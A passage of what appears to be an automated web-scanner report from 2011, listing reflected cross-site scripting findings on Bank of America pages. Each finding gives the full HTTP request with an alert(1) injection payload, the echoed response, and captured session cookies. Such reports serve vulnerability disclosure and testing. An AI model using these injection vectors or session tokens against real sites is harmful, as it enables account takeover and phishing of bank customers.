ZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31590
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:17:10 GMT

   <script type="text/javascript">
       alert ("Special Characters are not allowed.");
       location.href = "http://www.bankofamerica.com";
   </script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr
...[SNIP]...
<input type="hidden" name="hdnFullURL" value="PRIVACYASSIST.BANKOFAMERICA.COM/ELERTEF75D"><A B=C>A7D6A6016D9">
...[SNIP]...

1.29. https://privacyassist.bankofamerica.com/Pages2/English/AcctVerifier.asp [f parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages2/English/AcctVerifier.asp

Issue detail

The value of the f request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23d55"-alert(1)-"05b5cedf7ce was submitted in the f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages2/English/AcctVerifier.asp?f=elert23d55"-alert(1)-"05b5cedf7ce HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages2/English/ForgotPINNo.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; cmRS=&t1=1317910593889&t2=1317910599869&t3=1317910611783&lti=1317910611783&ln=Continue_with_the_Personal_Identification_Number_Authentication_ForgotPINNo&hr=javascript%3AContinue&fti=&fn=&ac=&fd=&uer=&fu=&pi=Ins%3ATool%3AProtect%3APrivAsst%3ALostPIN%3BCreditApproval&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: Wed, 05 Oct 2011 21:38:35 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:18:35 GMT
Content-Length: 31005

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>
<title>Bank of America | Privacy Assist | Personal Identification Number</title>
<meta name="descripti
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "f=elert23d55"-alert(1)-"05b5cedf7ce";

if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}
else
{
...[SNIP]...

1.30. https://privacyassist.bankofamerica.com/Pages2/English/ForgotPINNo.asp [FailureLogon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages2/English/ForgotPINNo.asp

Issue detail

The value of the FailureLogon request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b26b"-alert(1)-"b3b0473b639 was submitted in the FailureLogon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages2/English/ForgotPINNo.asp?FailureLogon=WrongUserID7b26b"-alert(1)-"b3b0473b639&ResCode=-34 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; cmRS=&t1=1317910549164&t2=1317910554938&t3=1317910588513&t4=1317910543764&lti=1317910585405&ln=Forgotten_UserID_PWD_Login.asp&hr=https%3A//privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp%3FFailureLogon%3DWrongUserID%26ResCode%3D-34&fti=1317910583953&fn=InsContentProtectPrivAsstLogin_frmLogon%3A0%3B&ac=0:R&fd=&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_PostLogon.asp&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18833
Content-Type: text/html
Expires: Thu, 06 Oct 2011 14:18:14 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:18:14 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Personal Identification Number</title>

<meta name="descri
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "FailureLogon=WrongUserID7b26b"-alert(1)-"b3b0473b639&ResCode=-34";

if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}

...[SNIP]...

1.31. https://privacyassist.bankofamerica.com/Pages2/English/ForgotPINNo.asp [ResCode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages2/English/ForgotPINNo.asp

Issue detail

The value of the ResCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d67f0"-alert(1)-"f255a508d0e was submitted in the ResCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages2/English/ForgotPINNo.asp?FailureLogon=WrongUserID&ResCode=-34d67f0"-alert(1)-"f255a508d0e HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=72; cmRS=&t1=1317910549164&t2=1317910554938&t3=1317910588513&t4=1317910543764&lti=1317910585405&ln=Forgotten_UserID_PWD_Login.asp&hr=https%3A//privacyassist.bankofamerica.com/Pages/English/IN_iforgotmyuserid.asp%3FFailureLogon%3DWrongUserID%26ResCode%3D-34&fti=1317910583953&fn=InsContentProtectPrivAsstLogin_frmLogon%3A0%3B&ac=0:R&fd=&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_PostLogon.asp&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18833
Content-Type: text/html
Expires: Thu, 06 Oct 2011 14:18:17 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:18:17 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<HEAD>

<title>Bank of America | Privacy Assist | Personal Identification Number</title>

<meta name="descri
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "FailureLogon=WrongUserID&ResCode=-34d67f0"-alert(1)-"f255a508d0e";

if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}
else
{
...[SNIP]...

1.32. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www2.bankofamerica.com
Path:	/promos/jump/greatdeals/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac4f"%20a%3db%207ef568e4941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cac4f" a=b 7ef568e4941 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /promos/jump/greatdeals/?cac4f"%20a%3db%207ef568e4941=1 HTTP/1.1
Host: www2.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 06 Oct 2011 13:00:17 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Set-Cookie: state=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/
Set-Cookie: STATE=CT; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com
Set-Cookie: state=CT; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com
Page-Completion-Status: Normal
Page-Completion-Status: Abnormal
Connection: close
Content-Length: 1627

<HTML>
<HEAD>
<TITLE>An Error Has Occurred</TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF" TEXT="#FFFFFF" LINK="#FFFFFF" VLINK="#FFFFFF" ALINK="#FFFFFF">

<FORM ACTION="/cferror.cgi" METHOD=POST>

<SCRIPT LA
...[SNIP]...
<XMP> CAC4F" A=B 7EF568E4941
</XMP>
...[SNIP]...

1.33. https://www9.bankofamerica.com/home-loans/loan-lp/purhome-lp.go [subCampCode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/loan-lp/purhome-lp.go

Issue detail

The value of the subCampCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c85dc"-alert(1)-"86d7da139d5 was submitted in the subCampCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /home-loans/loan-lp/purhome-lp.go?subCampCode=93265c85dc"-alert(1)-"86d7da139d5 HTTP/1.1
Host: www9.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:41:40 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Content-Length: 11934
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

...[SNIP]...
nguage="JavaScript" type="text/javascript">
window.onload = function() {
initializeWidget("/home-loans/mortgage/DisplayWidget", 'LeadFormType2', "LeadFormTypeWidgetDivId","BAC", "subCampCode=93265c85dc"-alert(1)-"86d7da139d5&FlightNum=&pCode=&cm_mmc=&SourceCode=&SubCampaignNum=&iCrossingIncluded=&mboxConfirmName=",
"/leads-and-prequal/lead-form-type-2");
}
</script>
...[SNIP]...

1.34. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go [SurveyDimensions parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www9.bankofamerica.com
Path:	/home-loans/surveyInitPopupAction.go

Issue detail

The value of the SurveyDimensions request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9df42"-alert(1)-"16d5c2ded7a was submitted in the SurveyDimensions parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes9df42"-alert(1)-"16d5c2ded7a&SurveyName=Survey&SurveyUrl=https://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@mrpr@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/mortgage-purchase.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; mbox=check#true#1317905950|session#1317905889373-229814#1317907750; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; 